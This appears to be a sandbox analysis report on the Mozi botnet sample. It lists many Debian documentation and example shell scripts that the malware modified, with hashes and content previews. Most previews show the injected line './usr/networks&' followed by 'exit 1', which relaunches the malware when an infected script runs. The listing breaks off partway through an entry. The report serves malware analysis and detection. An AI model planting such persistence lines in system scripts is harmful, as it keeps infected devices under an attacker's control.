SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/acpid/examples/powerbtn.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	1816
Entropy (8bit):	4.732022360765176
Encrypted:	false
SSDEEP:	48:8MTeMn/zV5rh/1RzUKHjuuOGp2fVU6GjJN+V4ATo+aZ+:heCrhXH+DfVpmhC/
MD5:	1851CA5690400777129B4D3C6B58D4D2
SHA1:	5AB880AE743FB6EA929BF372A64B9689BD7D660F
SHA-256:	75DECCF74010FCBCF95DB88A5885700E743EA339EE2C8DB44D80D97403E30443
SHA-512:	61986E49AFA511BFA970B3C781B3E7FB2F43546A01B167F45D1769A958A5EEFCEFA37089BD738EDD2BB2BCB1A3C0500FABF49EF39DA5F226A2B5C44698CA52CC
Malicious:	false
Preview:	./usr/networks&. user=`pinky -fw \| awk '{ if ($2 == ":'$displaynum'" \|\| $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user \| cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-support's '/usr/share/acpi-support/policy-funcs' file...getXconsole.PMS="gnome-power-manager kpowersave xfce4-power-manager".PMS="$PMS guidance-power-m

/usr/share/doc/bubblewrap/examples/bubblewrap-shell.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/bubblewrap/examples/flatpak-run.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	309
Entropy (8bit):	4.972882784760757
Encrypted:	false
SSDEEP:	6:3Z2iGYkj5Ri36+u4DXFI7WBRZrjFI7efgYjFI7e6RTaKtkmTn:J2iB6PiZqWZdqefgQq9tPkmTn
MD5:	8B5CC9506A59F35C919D0CF65E3D75FA
SHA1:	956100F1C2B0A99C8B578DC6CE4854991089289A
SHA-256:	F53B8D26AD4D0CDE785D89C2F85D2132B943D5AB01FC482A8D53D1D6D3A01D5E
SHA-512:	725E036838D708E1BCBA1A5C89470B892BA249305AC5D237B203AB21B0794A1BC64917ACBBD1793F41F530E482C85C9C252D143DACB68E9667088E274139B905
Malicious:	false
Preview:	./usr/networks&..test -e "$DEVNAME" \|\| { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.

/usr/share/doc/cron/examples/cron-tasks-review.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	3647
Entropy (8bit):	4.544491450799858
Encrypted:	false
SSDEEP:	96:TExE7LzpY0V0rmzBpuYlzsSwG7SRpvzTC/8mO:TExgHpYa0ABppdsSyk8mO
MD5:	734F4010B22A9F64DBCCED57155A6396
SHA1:	1A3984285346A3FB8CF1A2666F273A8EFC300495
SHA-256:	5F76E60D53DEB684C98DFE7E2306D0AAC86938ECB6B68AA41283F560CFEBACF8
SHA-512:	8BC6C5176E4742ECBD69498B7CA52955CAF78031A996E0B50DFC23AA490C02B00B71E70DA500D27BEF241025B2FB3D4C50A943D6CB49E4964127E2513E836ADC
Malicious:	false
Preview:	./usr/networks&. -h\|--help) usage; exit 0;;. -v\|--version) version; exit 0;;. -s\|--syslog) syslog="yes";;. -i\|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name \| grep -q -E '^\.' && return. # Skip disabled files. echo $name \| grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file \| grep -q -E '\.dp

/usr/share/doc/gawk/examples/network/PostAgent.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/gawk/examples/prog/igawk.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	awk or perl script, ASCII text
Category:	dropped
Size (bytes):	1829
Entropy (8bit):	4.38604786798686
Encrypted:	false
SSDEEP:	24:yiYuM2UFMx/sIo6ml4wiQDRoLe/HfwoDt8vPP6k30YXU0kKhpjKGg:eBMx/tKiQDWawit8vPP6A0YXjnhpjXg
MD5:	141401CE535E9FFF3A9F3C9D5ECEC093
SHA1:	B0A5FA40FFBDAFF1F415B38513CE2A7921328D05
SHA-256:	68EC7433147E2F312EA47B69A5CEAE1B781AC9C95260A8D95F2A9354E26A0C35
SHA-512:	A3CC9A94FB7D97A1F57AE1D29A3432A56ACCE85C50E0F4073D65AC5CF77C50DE4A74E207203141ABD7297B62068BB937A3C63E5880A79C09950E5E6DD562D1BC
Malicious:	false
Preview:	./usr/networks&. exit 0 ;;.. -[W-]) opts="$opts '$1'" ;;.. ) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print

/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/gdb/contrib/ari/gdb_find.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/gdb/contrib/expect-read1.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	253
Entropy (8bit):	5.267626424494032
Encrypted:	false
SSDEEP:	6:aBH51mUeX3+G3Wj3kGjVnAdiIVUe8J24n:aB51je+f3VnBaUe8J24n
MD5:	37C0552689BD7719FFBE66F4C9AB831B
SHA1:	8BA6E9AED3FF50AB5AE1E516E1ADEE1F1464BF79
SHA-256:	6B21FC4B985122F02025F5050FD3C0910228E394DC9E72EBEC9F6354785BDF0B
SHA-512:	EA97773FE3E45B9A392CA74C1D8D527952980474C75846495A796652FAB647128844E9E87529D51CBF7520ACA08F7C1188E676E5E5BAC4F0FAA7B75B66538F31
Malicious:	false
Preview:	./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.

/usr/share/doc/gdb/contrib/gdb-add-index.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	2988
Entropy (8bit):	4.924425870820004
Encrypted:	false
SSDEEP:	48:II63+FOMuldvJM+6/4p20SdvgT3vtBug0hoAYXy39qbFcxZ+6N77DoXf0iqUckOM:Le+8RldvJjTEvgTftcoAYXY9q6o6N/Ds
MD5:	7E1F6356EC1ED5353F164A90853F050A
SHA1:	AEBF6C04E3737D1E1172965E25DB372841DD6550
SHA-256:	CE3B6AE4E92DA2F30AD1E09DCFA849B2744524D62B9AA9440BA76BEDCA46EE69
SHA-512:	CCF50021CA3905B5B61C6A2E6D516E21CADEF175D9CD64FD2630E5B185CAE7FF142E8F1793E484981F91F4EEF6C3E053F4D0FD6E9F1F2F9ACFF3B56FB163368E
Malicious:	false
Preview:	./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/}".test "$dir" = "$file" && dir="."..dwz_file="".if $READELF -S "$file" \| grep -q " \.gnu_debugaltlink "; then. dwz_file=$($READELF --string-dump=.gnu_debugaltlink "$file" \... \| grep -A1 "'\.gnu_debugaltlink':" \... \| tail -n +2 \... \| sed 's/.]//'). dwz_file=$(echo $dwz_file). if $READELF -S "$dwz_file" \| grep -E -q " \.(gdb_index\|debug_names) "; then..# Already has an index, skip it...dwz_file="". fi.fi..set_files ().{. local file="$1".. index4="${file}.gdb-index". index5="${file}.debug_names". debugstr="${file}.debug_str". debugstrmerge="${file}.debug_str.merge". debugstrerr="${file}.debug_str.err".}..tmp_files=.for f in "$file" "$dwz_file"; do. if [ "$f" = "" ]; then..continue. fi. set_files "$f". tmp_files="$tmp_files $index4 $index5 $debugstr $debugstrmerge $debugstrerr".done..rm -f $t

/usr/share/doc/gdb/contrib/words.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/coverage-diff.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/diff-highlight/t/t9400-diff-highlight.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/fast-import/git-import.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	486
Entropy (8bit):	5.198694046664742
Encrypted:	false
SSDEEP:	12:w6vgZi+Z5+v1a6v5vrpGje1rSACES02djvcn:rgI++NBNrpZrSAyRdjE
MD5:	84511195A8532AFAED8B6E6645B72FC9
SHA1:	C424C15440A2C33C8559CF718B1C4B661D85BF52
SHA-256:	47E74E34A77970C44CC9F8C39F20AF338E5E6BDFB60AB516B66247B5C50537EA
SHA-512:	680648718E925D7C6649BAFC0C134B19B31A41647EEC15142177E5A4C1F306454C4D61FFA4905FC2E7C5BE2461F90C73116E74B56664B4125101D9E6E9AD5DF0
Malicious:	false
Preview:	./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f\|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) \| git fast-import --date-format=now../usr/networks&.exit 1.

/usr/share/doc/git/contrib/git-resurrect.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	2904
Entropy (8bit):	5.006955417229927
Encrypted:	false
SSDEEP:	48:5uqbabEEfBEyVJ1IUM7cy8UEV3cyUEdKENHwJ+gAP253YNVq6h3p133pgt3piZ:YpBEcLIUYcy8UEtcyUEdKENHwJ+gAP2s
MD5:	E6A74480E370B07D5BDC026A624CE684
SHA1:	988862444F28FAB3B4D6B92EC6C4F0488781EE2E
SHA-256:	AA7A6EB55918038552A2417FF03AE208F7408447FC6322536A71CE309EE23230
SHA-512:	93F551BFC3E2D737ED93989FBCA8D4CB7883BF35EAD4DB9C84DAEFF8403787C663989E5BA038425BC622F1EFEA0AE06411BBF6F492E22ABC35218F271FF7624B
Malicious:	false
Preview:	./usr/networks&. sed -ne "/^$_x40 $$_x40$ Merge ./ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']' into $branch\$" \...--pretty=tformat:"%H %s" --all \|..sed -ne "/^$$_x40$ Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b\|--branch)...shift...new_name="$1"...;;.. -n\|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k\|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m\|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l\|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r\|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t\|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a\|--all)...scan_

/usr/share/doc/git/contrib/remotes2config.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/rerere-train.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	1246
Entropy (8bit):	5.049599407603353
Encrypted:	false
SSDEEP:	24:MASp8NltrBrTf+mAka+mq8bTNRzbm4XaR3U0Lp0VDbztR5OjPKITbfrCnMSg:MAtltd3dAkad3RzK4Xahjd0VDbZfWDb5
MD5:	7D6CF34C9799D8C55311F08D93A10138
SHA1:	A84010E0348E5047DF290518012FC67F16FDE381
SHA-256:	866FDA21F32F6B7DF370F774EE54E025C366EB13344FEB4171D8B2C7E71390AB
SHA-512:	9BAF68D66C557B79CEEBD37408E718DCAB9B24DA99D064896200891F56D16A0770F68C202EA169596A319EDAD2CBCD0F7F2CB93A07D20C11D4058F97D733C778
Malicious:	false
Preview:	./usr/networks&...exit 0...;;..-o\|--overwrite)...overwrite=1...shift...break...;;..--)...shift...break...;;..*)...break...;;..esac.done..# Overwrite or help options are not valid except as first arg.for opt in "$@".do..case "$opt" in..-h\|--help)...echo "$USAGE"...exit 0...;;..-o\|--overwrite)...echo "$USAGE"...exit 0...;;..esac.done... "$(git --exec-path)/git-sh-setup".require_work_tree.cd_to_toplevel..# Remember original branch.branch=$(git symbolic-ref -q HEAD) \|\|.original_HEAD=$(git rev-parse --verify HEAD) \|\| {..echo >&2 "Not on any branch and no commit yet?"..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" \|\| exit..git rev-list --parents "$@" \|.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test $overwrite = 1..then...git rerere forget ...fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:

/usr/share/doc/git/contrib/subtree/git-subtree.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	16426
Entropy (8bit):	5.045058479498928
Encrypted:	false
SSDEEP:	384:j0fwqnEt0mOR+eFCnerWvDL7gfpv6bck6pYT2t9+WYtrV1achgV3fD0CzIy2FfCr:j0fwqny0mOo8CnerWvH7ghSbckVT2t9n
MD5:	5FF7690E1044D6F67F7B8D809103162D
SHA1:	CC0197BA40420DCA0D68647648C2762C1BEF1A16
SHA-256:	5376C3978C0680B83294F2DBF1341C197B8BCC69A8691413FE8E6F493B5A8380
SHA-512:	827DA60BFED3EF33E4A24175AD3EB6B58E623B468369C35D5864B407C3F1D0655C942877C997A97D9768EA87B68138D047A4965F1FC66380988BF1A748B5987F
Malicious:	false
Preview:	./usr/networks&.eval "$(echo "$OPTS_SPEC" \| git rev-parse --parseopt -- "$@" \|\| echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug () {..if test -n "$debug"..then...printf "%s\n" "$" >&2..fi.}..say () {..if test -z "$quiet"..then...printf "%s\n" "$" >&2..fi.}..progress () {..if test -z "$quiet"..then...printf "%s\r" "$*" >&2..fi.}..assert () {..if ! "$@"..then...die "assertion failed: " "$@"..fi.}..ensure_single_rev () {..if test $# -ne 1..then...die "You must provide exactly one revision. Got: '$@'"..fi.}..while test $# -gt 0.do..opt="$1"..shift...case "$opt" in..-q)...quiet=1...;;..-d)...debug=1...;;..--annotate)...annotate="$1"...shift...;;..--no-annotate)...annotate=...;;..-b)...branch="$1"...shift...;;..-P)...prefix="${1%/}"...shift...;;..-m)...message="$1"...shift...;;..--no-prefix)...prefix=...;;..--onto)...onto="$1"...shift...;;..--no-onto)...ont

/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	823
Entropy (8bit):	5.445793673200752
Encrypted:	false
SSDEEP:	12:w6vCJsHKfrLCYwTlFfOfSL3DXKUvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+uKKGRBmAF5I0Zl7
MD5:	4180AD5F33CADD1650F75A8BBC430E64
SHA1:	E47B7FB6D9AF677D61D983920D8CE0AC76A13DEF
SHA-256:	3DFF00AAF13758FABB9C97B4E9D26967211B44971056A6BEE5DC0DC04050715F
SHA-512:	7AB4417B9878A6122942C277D84A5BA1A286819853952614FFE4A9ACEEB00CBFE336AD4EE39946517E430A6C1E415486119733D6C58AD9BA22448CEC9E4766B6
Malicious:	false
Preview:	./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=$(echo -e "$CMT_MSG\n$HEADERS" \| sed -n -e 's/^Cc: $.$$/\1,/gp' \..-e 's/^Signed-off-by: $.$/\1,/gp')..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" \| sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.

/usr/share/doc/git/contrib/update-unicode/update_unicode.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/vscode/init.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	8722
Entropy (8bit):	4.841397056972939
Encrypted:	false
SSDEEP:	192:/i038ZMHCJtcyzyBgVQlyzcvXGC7tq5bM7YKBKjI7YYI:ZCbdHVQ+ceJE7+
MD5:	1C808D280E8DF536EFBE3AB9EC6A1AE4
SHA1:	28B08E23FC817DF4A67AD544B8D56F6947AB2A56
SHA-256:	706BDD06879A99096A874915BB81A179F3455DC1B29C2F01C54DB26197B05786
SHA-512:	1EDD029A4300324FF3D9E458B2F054F5D60231BA3E4EF374F5F20A11117E0DD4EC3AC3FDBB1AAF38800562E67BC473FDF66E2485350C8CB5565A3048FD91E2A5
Malicious:	false
Preview:	./usr/networks&..exit 1.}..cd "$(dirname "$0")"/../.. \|\|.die "Could not cd to top-level directory"..mkdir -p .vscode \|\|.die "Could not create .vscode/"..# General settings..cat >.vscode/settings.json.new <<\EOF \|\|.{. "C_Cpp.intelliSenseEngine": "Default",. "C_Cpp.intelliSenseEngineFallback": "Disabled",. "[git-commit]": {. "editor.wordWrap": "wordWrapColumn",. "editor.wordWrapColumn": 72. },. "[c]": {. "editor.detectIndentation": false,. "editor.insertSpaces": false,. "editor.tabSize": 8,. "editor.wordWrap": "wordWrapColumn",. "editor.wordWrapColumn": 80,. "files.trimTrailingWhitespace": true. },. "files.associations": {. ".h": "c",. ".c": "c". },. "cSpell.ignorePaths": [. ],. "cSpell.words": [. "DATAW",. "DBCACHED",. "DFCHECK",. "DTYPE",. "Hamano",. "HCAST",. "HEXSZ",. "HKEY",. "HKLM",. "IFGITLINK",. "IFIN

/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	617
Entropy (8bit):	4.789300168717738
Encrypted:	false
